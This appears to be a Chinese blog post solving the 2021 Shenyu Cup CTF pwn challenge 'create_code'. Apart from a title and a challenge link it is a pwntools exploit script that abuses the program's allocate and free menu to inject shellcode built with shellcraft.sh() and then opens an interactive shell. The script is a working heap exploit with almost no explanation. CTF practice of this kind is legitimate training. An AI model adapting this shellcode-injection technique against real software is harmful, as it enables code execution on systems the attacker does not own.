练习1

发表于2025-01-29更新于2025-01-31

[深育杯 2021]create_code

Ubuntu20

题目链接 : https://www.nssctf.cn/problem/775

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *

#io = remote("node4.anna.nssctf.cn", 28906)
io = process("./create_code")
context(os='linux', arch='amd64')
#context.log_level='debug'

def debug():
    gdb.attach(io)

def malloc(message = b'a'):
    io.sendlineafter(b'> ', b'1')
    io.sendafter(b'content: ', message)

def free(idx):
    io.sendlineafter(b'> ', b'3')
    io.sendlineafter(b'id: ', str(idx).encode())

malloc()
payload = b'\x0c\x00' * (0xbc // 2) + asm(shellcraft.sh())
malloc(payload)
free(0)
payload = p32(4027772946) + b'\x0c\x00' * (0x3E4 // 2)
#debug()
malloc(payload)
io.interactive()